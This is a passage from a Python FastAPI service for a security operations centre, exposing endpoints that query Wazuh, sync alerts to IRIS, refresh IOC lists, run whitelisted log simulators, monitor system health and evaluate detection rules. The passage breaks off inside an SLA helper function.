  1429. async def wazuh_auth_test() -> ApiResponse:
  1430. try:
  1431. result = await wazuh_adapter.auth_test()
  1432. except Exception as exc:
  1433. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1434. return ApiResponse(data={"wazuh": result})
  1435. @app.get(
  1436. "/wazuh/manager-info",
  1437. response_model=ApiResponse,
  1438. summary="Wazuh manager info",
  1439. description="Return manager information from Wazuh API.",
  1440. )
  1441. async def wazuh_manager_info() -> ApiResponse:
  1442. try:
  1443. result = await wazuh_adapter.get_manager_info()
  1444. except Exception as exc:
  1445. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1446. return ApiResponse(data={"wazuh": result})
  1447. @app.get(
  1448. "/wazuh/agents",
  1449. response_model=ApiResponse,
  1450. summary="List Wazuh agents",
  1451. description="List registered Wazuh agents with pagination and optional field selection.",
  1452. )
  1453. async def wazuh_agents(
  1454. limit: int = 50,
  1455. offset: int = 0,
  1456. select: str | None = None,
  1457. ) -> ApiResponse:
  1458. try:
  1459. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1460. except Exception as exc:
  1461. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1462. return ApiResponse(data={"wazuh": result})
  1463. @app.get(
  1464. "/wazuh/alerts",
  1465. response_model=ApiResponse,
  1466. summary="List Wazuh alerts",
  1467. description="List alert-like entries from manager logs API for current Wazuh build.",
  1468. )
  1469. async def wazuh_alerts(
  1470. limit: int = 50,
  1471. offset: int = 0,
  1472. q: str | None = None,
  1473. sort: str | None = None,
  1474. ) -> ApiResponse:
  1475. try:
  1476. # In this Wazuh build, API alerts are exposed via manager logs.
  1477. result = await wazuh_adapter.list_manager_logs(
  1478. limit=limit, offset=offset, q=q, sort=sort
  1479. )
  1480. except Exception as exc:
  1481. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1482. return ApiResponse(data={"wazuh": result})
  1483. @app.get(
  1484. "/wazuh/manager-logs",
  1485. response_model=ApiResponse,
  1486. summary="List Wazuh manager logs",
  1487. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1488. )
  1489. async def wazuh_manager_logs(
  1490. limit: int = 50,
  1491. offset: int = 0,
  1492. q: str | None = None,
  1493. sort: str | None = None,
  1494. ) -> ApiResponse:
  1495. try:
  1496. result = await wazuh_adapter.list_manager_logs(
  1497. limit=limit, offset=offset, q=q, sort=sort
  1498. )
  1499. except Exception as exc:
  1500. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1501. return ApiResponse(data={"wazuh": result})
  1502. @app.post(
  1503. "/wazuh/sync-to-mvp",
  1504. response_model=ApiResponse,
  1505. dependencies=[Depends(require_internal_api_key)],
  1506. summary="Sync Wazuh to MVP",
  1507. description="Fetch Wazuh alerts from indexer and create IRIS Alerts for each. Returns iris_alert_ids of created alerts.",
  1508. )
  1509. async def wazuh_sync_to_mvp(
  1510. limit: int = 50,
  1511. minutes: int = 120,
  1512. q: str = "soc_mvp_test=true OR event_type:*",
  1513. min_severity: str | None = None,
  1514. ) -> ApiResponse:
  1515. try:
  1516. result = await mvp_service.sync_wazuh_alerts(
  1517. query=q, limit=limit, minutes=minutes, min_severity=min_severity
  1518. )
  1519. except Exception as exc:
  1520. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1521. return ApiResponse(data={"sync": result})
  1522. @app.get(
  1523. "/wazuh/auto-sync/status",
  1524. response_model=ApiResponse,
  1525. summary="Wazuh auto-sync status",
  1526. description="Show auto-sync enablement, settings, task runtime state, and last sync result (iris_alert_ids of created IRIS Alerts).",
  1527. )
  1528. async def wazuh_auto_sync_status() -> ApiResponse:
  1529. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1530. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1531. policy = mvp_service.repo.get_policy()
  1532. return ApiResponse(
  1533. data={
  1534. "enabled": settings.wazuh_auto_sync_enabled,
  1535. "task_running": bool(task and not task.done()),
  1536. "settings": {
  1537. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1538. "limit": settings.wazuh_auto_sync_limit,
  1539. "minutes": settings.wazuh_auto_sync_minutes,
  1540. "query": settings.wazuh_auto_sync_query,
  1541. "min_severity": policy.get("sync", {}).get("min_severity", "medium"),
  1542. },
  1543. "state": state,
  1544. }
  1545. )
  1546. @app.post(
  1547. "/wazuh/ioc-lists/refresh",
  1548. response_model=ApiResponse,
  1549. dependencies=[Depends(require_internal_api_key)],
  1550. summary="Trigger IOC list refresh",
  1551. description="Fetch public IOC feeds and local confirmed hits, write CDB list files, and restart Wazuh analysisd.",
  1552. )
  1553. async def ioc_lists_refresh() -> ApiResponse:
  1554. state = getattr(app.state, "ioc_refresh_state", {})
  1555. state["running"] = True
  1556. state["last_started_at"] = datetime.now(timezone.utc).isoformat()
  1557. try:
  1558. result = await ioc_list_service.refresh()
  1559. state["last_status"] = "ok"
  1560. state["last_result"] = result
  1561. state["last_error"] = None
  1562. state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  1563. return ApiResponse(data=result)
  1564. except Exception as exc:
  1565. state["last_status"] = "error"
  1566. state["last_error"] = str(exc)
  1567. state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  1568. raise HTTPException(status_code=500, detail=str(exc)) from exc
  1569. finally:
  1570. state["running"] = False
  1571. @app.get(
  1572. "/wazuh/ioc-lists/status",
  1573. response_model=ApiResponse,
  1574. summary="IOC list status",
  1575. description="Return the last refresh result and current entry counts for each CDB list file.",
  1576. )
  1577. async def ioc_lists_status() -> ApiResponse:
  1578. state = getattr(app.state, "ioc_refresh_state", {})
  1579. task = getattr(app.state, "ioc_refresh_task", None)
  1580. disk_status = ioc_list_service.list_status()
  1581. return ApiResponse(
  1582. data={
  1583. "enabled": settings.ioc_refresh_enabled,
  1584. "task_running": bool(task and not task.done()),
  1585. "settings": {
  1586. "interval_seconds": settings.ioc_refresh_interval_seconds,
  1587. "confidence_threshold": settings.ioc_refresh_confidence_threshold,
  1588. "lookback_days": settings.ioc_refresh_lookback_days,
  1589. "lists_path": settings.wazuh_lists_path,
  1590. },
  1591. "disk": disk_status,
  1592. "state": state,
  1593. }
  1594. )
  1595. @app.get(
  1596. "/wazuh/sync-policy",
  1597. response_model=ApiResponse,
  1598. summary="Get Wazuh sync policy",
  1599. description="Return the current sync policy (min_severity threshold for IRIS alert creation).",
  1600. )
  1601. async def get_sync_policy() -> ApiResponse:
  1602. policy = mvp_service.repo.get_policy()
  1603. return ApiResponse(data={"sync": policy.get("sync", {"min_severity": "medium"})})
  1604. @app.put(
  1605. "/wazuh/sync-policy",
  1606. response_model=ApiResponse,
  1607. dependencies=[Depends(require_internal_api_key)],
  1608. summary="Update Wazuh sync policy",
  1609. description="Set the minimum severity level for forwarding Wazuh alerts to IRIS. Persists immediately; auto-sync picks it up on the next cycle.",
  1610. )
  1611. async def put_sync_policy(body: SyncPolicyRequest) -> ApiResponse:
  1612. policy = mvp_service.repo.get_policy()
  1613. policy.setdefault("sync", {})["min_severity"] = body.min_severity
  1614. mvp_service.repo.update_policy(policy)
  1615. return ApiResponse(data={"sync": policy["sync"]})
  1616. @app.get(
  1617. "/monitor/db/tables",
  1618. response_model=ApiResponse,
  1619. dependencies=[Depends(require_internal_api_key)],
  1620. summary="List database tables",
  1621. description="List soc-integrator PostgreSQL tables with row count and relation size.",
  1622. )
  1623. async def monitor_db_tables() -> ApiResponse:
  1624. rows: list[dict[str, object]] = []
  1625. with get_conn() as conn, conn.cursor() as cur:
  1626. cur.execute(
  1627. """
  1628. SELECT
  1629. t.schemaname,
  1630. t.tablename,
  1631. COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
  1632. COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
  1633. COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
  1634. FROM pg_tables t
  1635. LEFT JOIN pg_stat_user_tables s
  1636. ON s.schemaname = t.schemaname
  1637. AND s.relname = t.tablename
  1638. WHERE t.schemaname = 'public'
  1639. ORDER BY t.tablename
  1640. """
  1641. )
  1642. tables = cur.fetchall()
  1643. for item in tables:
  1644. schema = str(item.get("schemaname") or "public")
  1645. table = str(item.get("tablename") or "")
  1646. if not table:
  1647. continue
  1648. cur.execute(
  1649. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1650. sql.Identifier(schema),
  1651. sql.Identifier(table),
  1652. )
  1653. )
  1654. count_row = cur.fetchone() or {}
  1655. row_count = int(count_row.get("cnt", 0) or 0)
  1656. rows.append(
  1657. {
  1658. "schema": schema,
  1659. "table": table,
  1660. "row_count": row_count,
  1661. "estimated_rows": int(item.get("estimated_rows", 0) or 0),
  1662. "size_bytes": int(item.get("size_bytes", 0) or 0),
  1663. "size_pretty": str(item.get("size_pretty") or "0 bytes"),
  1664. }
  1665. )
  1666. return ApiResponse(
  1667. data={
  1668. "database": settings.soc_integrator_db_name,
  1669. "generated_at": datetime.now(timezone.utc).isoformat(),
  1670. "tables": rows,
  1671. }
  1672. )
  1673. @app.get(
  1674. "/monitor/db/tables/{table_name}/rows",
  1675. response_model=ApiResponse,
  1676. dependencies=[Depends(require_internal_api_key)],
  1677. summary="List rows from selected table",
  1678. description="Return rows from a selected public table with pagination.",
  1679. )
  1680. async def monitor_db_table_rows(
  1681. table_name: str,
  1682. limit: int = 50,
  1683. offset: int = 0,
  1684. ) -> ApiResponse:
  1685. table = str(table_name or "").strip()
  1686. if not table:
  1687. raise HTTPException(status_code=400, detail="table_name is required")
  1688. page_limit = max(1, min(int(limit), 500))
  1689. page_offset = max(0, int(offset))
  1690. with get_conn() as conn, conn.cursor() as cur:
  1691. cur.execute(
  1692. """
  1693. SELECT 1
  1694. FROM pg_tables
  1695. WHERE schemaname = 'public' AND tablename = %s
  1696. LIMIT 1
  1697. """,
  1698. (table,),
  1699. )
  1700. if not cur.fetchone():
  1701. raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
  1702. cur.execute(
  1703. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1704. sql.Identifier("public"),
  1705. sql.Identifier(table),
  1706. )
  1707. )
  1708. total_row = cur.fetchone() or {}
  1709. total = int(total_row.get("cnt", 0) or 0)
  1710. cur.execute(
  1711. sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
  1712. sql.Identifier("public"),
  1713. sql.Identifier(table),
  1714. ),
  1715. (page_limit, page_offset),
  1716. )
  1717. rows = [dict(item) for item in (cur.fetchall() or [])]
  1718. return ApiResponse(
  1719. data={
  1720. "table": table,
  1721. "limit": page_limit,
  1722. "offset": page_offset,
  1723. "total": total,
  1724. "rows": rows,
  1725. }
  1726. )
  1727. @app.get(
  1728. "/monitor/systems",
  1729. response_model=ApiResponse,
  1730. dependencies=[Depends(require_internal_api_key)],
  1731. summary="Systems monitor overview",
  1732. description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
  1733. )
  1734. async def monitor_systems(
  1735. minutes: int = 60,
  1736. limit: int = 20,
  1737. include_raw: bool = False,
  1738. ) -> ApiResponse:
  1739. window_minutes = max(1, minutes)
  1740. row_limit = max(1, limit)
  1741. now = datetime.now(timezone.utc)
  1742. since = now - timedelta(minutes=window_minutes)
  1743. now_iso = now.isoformat()
  1744. dependencies = await mvp_service.dependency_health()
  1745. monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
  1746. last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
  1747. # KPI counters from persisted database records in the selected lookback window.
  1748. alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
  1749. detections_matched = repo.count_c_detection_events_since(since=since)
  1750. iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
  1751. pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
  1752. pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
  1753. wazuh_recent: list[object] = []
  1754. wazuh_recent_error: str | None = None
  1755. try:
  1756. wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
  1757. wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
  1758. except Exception as exc:
  1759. wazuh_recent_error = str(exc)
  1760. shuffle_recent: list[object] = []
  1761. shuffle_recent_error: str | None = None
  1762. try:
  1763. workflows_resp = await shuffle_adapter.list_workflows()
  1764. workflows = _extract_first_array(workflows_resp)
  1765. for item in workflows[:row_limit]:
  1766. if isinstance(item, dict):
  1767. shuffle_recent.append(
  1768. {
  1769. "id": item.get("id") or item.get("workflow_id"),
  1770. "name": item.get("name") or item.get("workflow", {}).get("name"),
  1771. "status": item.get("status"),
  1772. }
  1773. )
  1774. else:
  1775. shuffle_recent.append(item)
  1776. except Exception as exc:
  1777. shuffle_recent_error = str(exc)
  1778. iris_recent: list[object] = []
  1779. iris_recent_error: str | None = None
  1780. try:
  1781. iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
  1782. iris_recent = _extract_first_array(iris_resp)[:row_limit]
  1783. except Exception as exc:
  1784. iris_recent_error = str(exc)
  1785. pagerduty_recent = repo.list_recent_escalations(limit=row_limit)
  1786. def build_card(
  1787. label: str,
  1788. dependency_key: str,
  1789. recent: list[object],
  1790. kpis: dict[str, object],
  1791. extra_error: str | None = None,
  1792. ) -> dict[str, object]:
  1793. dep = dependencies.get(dependency_key, {})
  1794. dep_status = str(dep.get("status") or "down")
  1795. status = "ok" if dep_status == "up" else "down"
  1796. if dep_status == "up":
  1797. last_ok_at_by_key[label] = now_iso
  1798. error_parts: list[str] = []
  1799. if dep.get("error"):
  1800. error_parts.append(str(dep.get("error")))
  1801. if extra_error:
  1802. error_parts.append(extra_error)
  1803. if dep_status == "up" and extra_error:
  1804. status = "degraded"
  1805. card: dict[str, object] = {
  1806. "status": status,
  1807. "latency_ms": dep.get("latency_ms"),
  1808. "last_ok_at": last_ok_at_by_key.get(label),
  1809. "last_error": " | ".join(error_parts) if error_parts else None,
  1810. "kpis": kpis,
  1811. "recent": recent,
  1812. }
  1813. if include_raw:
  1814. card["raw"] = dep.get("details")
  1815. return card
  1816. cards = {
  1817. "wazuh": build_card(
  1818. label="wazuh",
  1819. dependency_key="wazuh",
  1820. recent=wazuh_recent,
  1821. extra_error=wazuh_recent_error,
  1822. kpis={
  1823. "alerts_ingested": alerts_ingested,
  1824. "recent_rows": len(wazuh_recent),
  1825. },
  1826. ),
  1827. "shuffle": build_card(
  1828. label="shuffle",
  1829. dependency_key="shuffle",
  1830. recent=shuffle_recent,
  1831. extra_error=shuffle_recent_error,
  1832. kpis={
  1833. "recent_workflows": len(shuffle_recent),
  1834. },
  1835. ),
  1836. "iris": build_card(
  1837. label="iris",
  1838. dependency_key="iris",
  1839. recent=iris_recent,
  1840. extra_error=iris_recent_error,
  1841. kpis={
  1842. "tickets_created": iris_tickets_created,
  1843. "recent_rows": len(iris_recent),
  1844. },
  1845. ),
  1846. "pagerduty": build_card(
  1847. label="pagerduty",
  1848. dependency_key="pagerduty_stub",
  1849. recent=pagerduty_recent,
  1850. kpis={
  1851. "escalations_sent": pagerduty_escalations_sent,
  1852. "escalations_failed": pagerduty_escalations_failed,
  1853. },
  1854. ),
  1855. }
  1856. app.state.systems_monitor_state = monitor_state
  1857. return ApiResponse(
  1858. data={
  1859. "generated_at": now_iso,
  1860. "window_minutes": window_minutes,
  1861. "cards": cards,
  1862. "pipeline": {
  1863. "alerts_ingested": alerts_ingested,
  1864. "detections_matched": detections_matched,
  1865. "iris_tickets_created": iris_tickets_created,
  1866. "pagerduty_escalations_sent": pagerduty_escalations_sent,
  1867. "pagerduty_escalations_failed": pagerduty_escalations_failed,
  1868. },
  1869. }
  1870. )
  1871. @app.get(
  1872. "/sim/logs/runs",
  1873. response_model=ApiResponse,
  1874. dependencies=[Depends(require_internal_api_key)],
  1875. summary="List simulator runs",
  1876. description="List active and recent simulator script runs started from soc-integrator.",
  1877. )
  1878. async def sim_logs_runs() -> ApiResponse:
  1879. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1880. items: list[dict[str, object]] = []
  1881. for run_id, run in sim_runs.items():
  1882. serialized = _serialize_sim_run(run_id, run)
  1883. if (not serialized["running"]) and not run.get("stopped_at"):
  1884. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1885. serialized["stopped_at"] = run["stopped_at"]
  1886. items.append(serialized)
  1887. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1888. return ApiResponse(data={"items": items})
  1889. @app.post(
  1890. "/sim/logs/start",
  1891. response_model=ApiResponse,
  1892. dependencies=[Depends(require_internal_api_key)],
  1893. summary="Start simulator logs script",
  1894. description="Start a whitelisted simulator script in background and return run metadata.",
  1895. )
  1896. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1897. script_name = SIM_SCRIPT_MAP[payload.script]
  1898. script_path = SIM_SCRIPTS_DIR / script_name
  1899. if not script_path.exists():
  1900. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1901. cmd = _build_sim_command(payload)
  1902. env = dict(os.environ)
  1903. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1904. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1905. run_id = str(uuid.uuid4())
  1906. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1907. log_handle = None
  1908. try:
  1909. log_handle = log_file.open("ab")
  1910. process = subprocess.Popen(
  1911. cmd,
  1912. cwd=str(SIM_SCRIPTS_DIR),
  1913. env=env,
  1914. stdout=log_handle,
  1915. stderr=subprocess.STDOUT,
  1916. start_new_session=True,
  1917. )
  1918. except Exception as exc:
  1919. if log_handle:
  1920. try:
  1921. log_handle.close()
  1922. except Exception:
  1923. pass
  1924. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1925. finally:
  1926. if log_handle:
  1927. log_handle.close()
  1928. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1929. sim_runs[run_id] = {
  1930. "script": payload.script,
  1931. "target": payload.target,
  1932. "scenario": payload.scenario,
  1933. "count": payload.count,
  1934. "delay_seconds": payload.delay_seconds,
  1935. "forever": payload.forever,
  1936. "pid": process.pid,
  1937. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1938. "started_at": datetime.now(timezone.utc).isoformat(),
  1939. "stopped_at": None,
  1940. "return_code": None,
  1941. "log_file": str(log_file),
  1942. "process": process,
  1943. }
  1944. app.state.sim_runs = sim_runs
  1945. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1946. @app.post(
  1947. "/sim/logs/stop/{run_id}",
  1948. response_model=ApiResponse,
  1949. dependencies=[Depends(require_internal_api_key)],
  1950. summary="Stop simulator run",
  1951. description="Stop a running simulator script by run_id.",
  1952. )
  1953. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1954. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1955. run = sim_runs.get(run_id)
  1956. if not run:
  1957. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1958. process = run.get("process")
  1959. if process and process.poll() is None:
  1960. try:
  1961. process.terminate()
  1962. process.wait(timeout=3)
  1963. except subprocess.TimeoutExpired:
  1964. process.kill()
  1965. except Exception as exc:
  1966. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1967. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1968. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1969. @app.post(
  1970. "/sim/logs/stop-running",
  1971. response_model=ApiResponse,
  1972. dependencies=[Depends(require_internal_api_key)],
  1973. summary="Stop all running simulator runs",
  1974. description="Stop all currently running simulator scripts (including forever mode).",
  1975. )
  1976. async def sim_logs_stop_running() -> ApiResponse:
  1977. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1978. stopped: list[dict[str, object]] = []
  1979. already_stopped = 0
  1980. for run_id, run in sim_runs.items():
  1981. process = run.get("process")
  1982. if process and process.poll() is None:
  1983. try:
  1984. process.terminate()
  1985. process.wait(timeout=3)
  1986. except subprocess.TimeoutExpired:
  1987. process.kill()
  1988. except Exception as exc:
  1989. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1990. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1991. stopped.append(_serialize_sim_run(run_id, run))
  1992. else:
  1993. already_stopped += 1
  1994. return ApiResponse(
  1995. data={
  1996. "stopped_count": len(stopped),
  1997. "already_stopped_count": already_stopped,
  1998. "runs": stopped,
  1999. }
  2000. )
  2001. @app.get(
  2002. "/sim/logs/output/{run_id}",
  2003. response_model=ApiResponse,
  2004. dependencies=[Depends(require_internal_api_key)],
  2005. summary="Get simulator run output",
  2006. description="Return tailed output lines from simulator run log file.",
  2007. )
  2008. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  2009. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  2010. run = sim_runs.get(run_id)
  2011. if not run:
  2012. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  2013. log_file_path = run.get("log_file")
  2014. if not log_file_path:
  2015. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  2016. log_file = Path(str(log_file_path))
  2017. lines = _tail_log_lines(log_file, limit=limit)
  2018. process = run.get("process")
  2019. running = bool(process and process.poll() is None)
  2020. return ApiResponse(
  2021. data={
  2022. "run_id": run_id,
  2023. "running": running,
  2024. "line_count": len(lines),
  2025. "lines": lines,
  2026. "text": "\n".join(lines),
  2027. "log_file": str(log_file),
  2028. }
  2029. )
  2030. @app.get(
  2031. "/sim/logs/wazuh-latest/{run_id}",
  2032. response_model=ApiResponse,
  2033. dependencies=[Depends(require_internal_api_key)],
  2034. summary="Get latest Wazuh logs/rules for simulator run",
  2035. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  2036. )
  2037. async def sim_logs_wazuh_latest(
  2038. run_id: str,
  2039. limit: int = 50,
  2040. minutes: int = 15,
  2041. include_raw: bool = False,
  2042. ) -> ApiResponse:
  2043. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  2044. run = sim_runs.get(run_id)
  2045. if not run:
  2046. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  2047. requested_minutes = max(1, int(minutes))
  2048. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  2049. effective_minutes = max(1440, requested_minutes)
  2050. query_limit = max(1, min(int(limit), 200))
  2051. query_text = "*"
  2052. try:
  2053. raw = await wazuh_adapter.search_alerts(
  2054. query=query_text,
  2055. limit=query_limit,
  2056. minutes=effective_minutes,
  2057. )
  2058. except Exception as exc:
  2059. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  2060. hits = _extract_wazuh_hits(raw)
  2061. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  2062. rules: list[dict[str, object]] = []
  2063. for hit in hits:
  2064. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  2065. if rule_item:
  2066. rules.append(rule_item)
  2067. return ApiResponse(
  2068. data={
  2069. "run": _serialize_sim_run(run_id, run),
  2070. "query": {
  2071. "effective_minutes": effective_minutes,
  2072. "text": query_text,
  2073. "limit": query_limit,
  2074. },
  2075. "events": events,
  2076. "rules": rules,
  2077. "totals": {
  2078. "events": len(events),
  2079. "rules": len(rules),
  2080. },
  2081. }
  2082. )
  2083. @app.post(
  2084. "/monitor/log-loss/check",
  2085. response_model=ApiResponse,
  2086. dependencies=[Depends(require_internal_api_key)],
  2087. summary="Check log loss",
  2088. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  2089. )
  2090. async def monitor_log_loss_check(
  2091. payload: LogLossCheckRequest | None = None,
  2092. create_ticket: bool = False,
  2093. ) -> ApiResponse:
  2094. req = payload or LogLossCheckRequest()
  2095. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  2096. return ApiResponse(data=result)
  2097. @app.post(
  2098. "/monitor/c-detections/evaluate",
  2099. response_model=ApiResponse,
  2100. dependencies=[Depends(require_internal_api_key)],
  2101. summary="Evaluate Appendix C detections",
  2102. description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
  2103. )
  2104. async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
  2105. if not settings.c_detection_enabled:
  2106. raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
  2107. started_at = datetime.now(timezone.utc).isoformat()
  2108. app.state.c_detection_state["last_started_at"] = started_at
  2109. try:
  2110. raw = await wazuh_adapter.search_alerts(
  2111. query=payload.query,
  2112. limit=max(1, payload.limit),
  2113. minutes=max(1, payload.minutes),
  2114. )
  2115. hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
  2116. normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
  2117. evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
  2118. records: list[dict[str, object]] = []
  2119. for match in evaluated.get("matches", []):
  2120. usecase_id = str(match.get("usecase_id") or "")
  2121. entity = str(match.get("entity") or "unknown")
  2122. severity = str(match.get("severity") or "medium")
  2123. evidence = dict(match.get("evidence") or {})
  2124. event_ref = {
  2125. "event_id": ((match.get("event") or {}).get("event_id")),
  2126. "timestamp": ((match.get("event") or {}).get("timestamp")),
  2127. "source": ((match.get("event") or {}).get("source")),
  2128. }
  2129. in_cooldown = repo.is_c_detection_in_cooldown(
  2130. usecase_id=usecase_id,
  2131. entity=entity,
  2132. cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
  2133. )
  2134. incident_key: str | None = None
  2135. event_row = repo.add_c_detection_event(
  2136. usecase_id=usecase_id,
  2137. entity=entity,
  2138. severity=severity,
  2139. evidence=evidence,
  2140. event_ref=event_ref,
  2141. incident_key=None,
  2142. )
  2143. if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
  2144. incident_event = _c_match_to_incident_event(match)
  2145. ingest = await mvp_service.ingest_incident(incident_event)
  2146. incident_key = str(ingest.get("incident_key") or "") or None
  2147. repo.update_c_detection_incident(int(event_row["id"]), incident_key)
  2148. records.append(
  2149. {
  2150. "id": event_row["id"],
  2151. "usecase_id": usecase_id,
  2152. "entity": entity,
  2153. "severity": severity,
  2154. "incident_key": incident_key,
  2155. "cooldown_active": in_cooldown,
  2156. "evidence": evidence,
  2157. }
  2158. )
  2159. result = {
  2160. "query": payload.query,
  2161. "minutes": max(1, payload.minutes),
  2162. "selectors": payload.selectors,
  2163. "dry_run": payload.dry_run,
  2164. "summary": evaluated.get("summary", {}),
  2165. "matches": records,
  2166. "total_hits": len(hits),
  2167. }
  2168. app.state.c_detection_state["last_status"] = "ok"
  2169. app.state.c_detection_state["last_result"] = result
  2170. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2171. return ApiResponse(data=result)
  2172. except Exception as exc:
  2173. app.state.c_detection_state["last_status"] = "error"
  2174. app.state.c_detection_state["last_error"] = str(exc)
  2175. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2176. raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2177. @app.get(
  2178. "/monitor/c-detections/history",
  2179. response_model=ApiResponse,
  2180. dependencies=[Depends(require_internal_api_key)],
  2181. summary="C detection history",
  2182. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2183. )
  2184. async def monitor_c_detections_history(
  2185. limit: int = 50,
  2186. offset: int = 0,
  2187. usecase_id: str | None = None,
  2188. ) -> ApiResponse:
  2189. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2190. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2191. @app.get(
  2192. "/monitor/c-detections/state",
  2193. response_model=ApiResponse,
  2194. dependencies=[Depends(require_internal_api_key)],
  2195. summary="C detection state",
  2196. description="Return Appendix C detection settings and last evaluation runtime state.",
  2197. )
  2198. async def monitor_c_detections_state() -> ApiResponse:
  2199. return ApiResponse(
  2200. data={
  2201. "enabled": settings.c_detection_enabled,
  2202. "settings": {
  2203. "window_minutes": settings.c_detection_window_minutes,
  2204. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2205. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2206. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2207. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2208. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2209. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2210. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2211. },
  2212. "state": getattr(app.state, "c_detection_state", {}),
  2213. }
  2214. )
  2215. # ---------------------------------------------------------------------------
  2216. # KPI Timeout helpers and IRIS alert routes
  2217. # ---------------------------------------------------------------------------
  2218. SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400}
  2219. def compute_kpi(
  2220. created_at: str,
  2221. severity_name: str,
  2222. resolved_at: str | None = None,
  2223. ) -> dict[str, object]:
  2224. sla = SLA_SECONDS.get(severity_name, 28800)
  2225. def _parse(ts: str) -> datetime:
  2226. dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
